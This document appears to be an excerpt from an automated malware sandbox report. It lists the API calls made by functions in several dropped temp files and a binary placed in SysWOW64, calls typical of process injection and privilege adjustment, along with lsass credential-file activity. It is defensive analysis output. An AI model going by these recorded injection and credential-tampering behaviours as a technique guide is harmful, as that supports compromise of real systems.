Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_00477130 LoadLibraryA,GetModuleHandleA,NtAdjustPrivilegesToken,	6_2_00477130
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_004793C6 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	6_2_004793C6
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_004773E3 NtAdjustPrivilegesToken,	6_2_004773E3
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_004793A1 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	6_2_004793A1
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F2477 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,	6_2_006F2477
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F042D GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,	6_2_006F042D
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F116F LoadLibraryA,GetModuleHandleA,LookupPrivilegeValueA,NtAdjustPrivilegesToken,	6_2_006F116F
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F2574 NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,	6_2_006F2574
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F252F NtOpenSection,	6_2_006F252F
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F05F2 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CloseHandle,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,	6_2_006F05F2
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F144A LookupPrivilegeValueA,NtAdjustPrivilegesToken,	6_2_006F144A
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F1422 LookupPrivilegeValueA,NtAdjustPrivilegesToken,	6_2_006F1422
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F3405 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	6_2_006F3405
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F24AE lstrcpyW,lstrlenW,NtCreateSection,	6_2_006F24AE
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F33E0 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	6_2_006F33E0
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_7FE323EE NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,	6_2_7FE323EE
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_7FE313C1 LookupPrivilegeValueA,NtAdjustPrivilegesToken,	6_2_7FE313C1
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_7FE31399 LookupPrivilegeValueA,NtAdjustPrivilegesToken,	6_2_7FE31399
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_7FE30601 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,	6_2_7FE30601
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_7FE329F1 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	6_2_7FE329F1
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_7FE329CC NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	6_2_7FE329CC
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_7FE324EB NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,	6_2_7FE324EB
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_7FE324A6 NtOpenSection,	6_2_7FE324A6
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_7FE30442 GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetThreadAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,	6_2_7FE30442
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_7FE32425 lstrcpyW,lstrlenW,NtCreateSection,	6_2_7FE32425
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_0047D14A GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetThreadAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,	7_2_0047D14A
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_0047F12D lstrcpyW,lstrlenW,NtCreateSection,	7_2_0047F12D
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_0047D309 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,	7_2_0047D309
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_0047E0C9 NtAdjustPrivilegesToken,	7_2_0047E0C9
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_0047F0F6 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,	7_2_0047F0F6
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_0047E0A1 NtAdjustPrivilegesToken,	7_2_0047E0A1
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_0047F1F3 NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,	7_2_0047F1F3
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_0047F1AE NtOpenSection,	7_2_0047F1AE
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_0047F6D4 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	7_2_0047F6D4
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_0047F6F9 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	7_2_0047F6F9
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_009B24A6 NtOpenSection,	7_2_009B24A6
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_009B24EB NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,	7_2_009B24EB
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_009B0442 GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetThreadAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,	7_2_009B0442
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_009B0601 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CloseHandle,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,	7_2_009B0601
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_009B13C1 LookupPrivilegeValueA,NtAdjustPrivilegesToken,	7_2_009B13C1
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_009B23EE NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,	7_2_009B23EE
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_009B2425 lstrcpyW,lstrlenW,NtCreateSection,	7_2_009B2425
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_009B29CC NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	7_2_009B29CC
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_009B29F1 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	7_2_009B29F1
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_009B1399 LookupPrivilegeValueA,NtAdjustPrivilegesToken,	7_2_009B1399
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_7FE323EE NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,	7_2_7FE323EE
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_7FE313C1 LookupPrivilegeValueA,NtAdjustPrivilegesToken,	7_2_7FE313C1
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_7FE31399 LookupPrivilegeValueA,NtAdjustPrivilegesToken,	7_2_7FE31399
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_7FE30601 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,	7_2_7FE30601
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_7FE329F1 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	7_2_7FE329F1
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_7FE329CC NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	7_2_7FE329CC
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_7FE324EB NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,	7_2_7FE324EB
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_7FE324A6 NtOpenSection,	7_2_7FE324A6
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_7FE30442 GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetThreadAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,	7_2_7FE30442
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_7FE32425 lstrcpyW,lstrlenW,NtCreateSection,	7_2_7FE32425
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_0042887F NtSetInformationProcess,	21_2_0042887F
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_0042212D GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,	21_2_0042212D
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_004241AE lstrcpyW,lstrlenW,NtCreateSection,	21_2_004241AE
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_004222F2 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,	21_2_004222F2
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_0042314A NtAdjustPrivilegesToken,	21_2_0042314A
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00424177 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,	21_2_00424177
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00423122 NtAdjustPrivilegesToken,	21_2_00423122
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00422E6F LoadLibraryA,GetModuleHandleA,NtAdjustPrivilegesToken,	21_2_00422E6F
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00424274 NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,	21_2_00424274
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_0042422F NtOpenSection,	21_2_0042422F
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00622477 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,	21_2_00622477
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_0062042D GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,	21_2_0062042D
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_0062116F LoadLibraryA,GetModuleHandleA,LookupPrivilegeValueA,NtAdjustPrivilegesToken,	21_2_0062116F
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00622574 NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,	21_2_00622574
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_0062252F NtOpenSection,	21_2_0062252F
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_006205F2 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CloseHandle,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,	21_2_006205F2
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_0062144A LookupPrivilegeValueA,NtAdjustPrivilegesToken,	21_2_0062144A
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00621422 LookupPrivilegeValueA,NtAdjustPrivilegesToken,	21_2_00621422
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00623405 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	21_2_00623405
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_006224AE lstrcpyW,lstrlenW,NtCreateSection,	21_2_006224AE
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_006233E0 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	21_2_006233E0
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_7FE323EE NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,	21_2_7FE323EE
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_7FE313C1 LookupPrivilegeValueA,NtAdjustPrivilegesToken,	21_2_7FE313C1
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_7FE31399 LookupPrivilegeValueA,NtAdjustPrivilegesToken,	21_2_7FE31399
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_7FE30601 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,	21_2_7FE30601
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_7FE329F1 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	21_2_7FE329F1
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_7FE329CC NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	21_2_7FE329CC
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_7FE324EB NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,	21_2_7FE324EB
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_7FE324A6 NtOpenSection,	21_2_7FE324A6
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_7FE30442 GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetThreadAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,	21_2_7FE30442
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_7FE32425 lstrcpyW,lstrlenW,NtCreateSection,	21_2_7FE32425
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_00A024A6 NtOpenSection,	34_2_00A024A6
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_00A024EB NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,	34_2_00A024EB
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_00A023EE NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,	34_2_00A023EE
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_00A013C1 LookupPrivilegeValueA,NtAdjustPrivilegesToken,	34_2_00A013C1
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_00A00601 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CloseHandle,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,	34_2_00A00601
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_00A00442 GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetThreadAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,	34_2_00A00442
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_00A01399 LookupPrivilegeValueA,NtAdjustPrivilegesToken,	34_2_00A01399
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_00A029F1 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	34_2_00A029F1
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_00A029CC NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	34_2_00A029CC
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_00A02425 lstrcpyW,lstrlenW,NtCreateSection,	34_2_00A02425
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_7FE423EE NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,	34_2_7FE423EE
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_7FE424EB NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,	34_2_7FE424EB
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_7FE429F1 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	34_2_7FE429F1
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_7FE413C1 LookupPrivilegeValueA,NtAdjustPrivilegesToken,	34_2_7FE413C1
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_7FE429CC NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	34_2_7FE429CC
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_7FE424A6 NtOpenSection,	34_2_7FE424A6
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_7FE41399 LookupPrivilegeValueA,NtAdjustPrivilegesToken,	34_2_7FE41399
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_7FE40442 GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetThreadAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,	34_2_7FE40442
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_7FE42425 lstrcpyW,lstrlenW,NtCreateSection,	34_2_7FE42425
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_7FE40601 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,	34_2_7FE40601

Source: C:\Windows\System32\lsass.exe	File created: C:\Windows\system32\Microsoft\Protect\S-1-5-18\User\6cac72b7-3651-45b8-933a-942b0f95b1c5	Jump to behavior
Source: C:\Windows\System32\lsass.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	Jump to behavior
Source: C:\Windows\System32\lsass.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	Jump to behavior
Source: C:\Windows\System32\lsass.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	Jump to behavior
Source: C:\Windows\System32\lsass.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	Jump to behavior
Source: C:\Windows\System32\lsass.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	File created: C:\Windows\SysWOW64\zvhcfa.exe	Jump to behavior

Source: C:\Windows\System32\lsass.exe

File deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_00479CE0	6_2_00479CE0
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_00479CF7	6_2_00479CF7
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_00479C83	6_2_00479C83
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_00478889	6_2_00478889
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_00479CB1	6_2_00479CB1
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_00479D0C	6_2_00479D0C
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_00477130	6_2_00477130
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_00479BFE	6_2_00479BFE
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F116F	6_2_006F116F
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F3C3D	6_2_006F3C3D
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F3CF0	6_2_006F3CF0
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F28C8	6_2_006F28C8
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F3CC2	6_2_006F3CC2
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F3D4B	6_2_006F3D4B
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F3D36	6_2_006F3D36
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F3D1F	6_2_006F3D1F
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_7FE34112	6_2_7FE34112
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_00480E1A	7_2_00480E1A
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_009B60A7	7_2_009B60A7
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_009B4112	7_2_009B4112
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_7FE34112	7_2_7FE34112
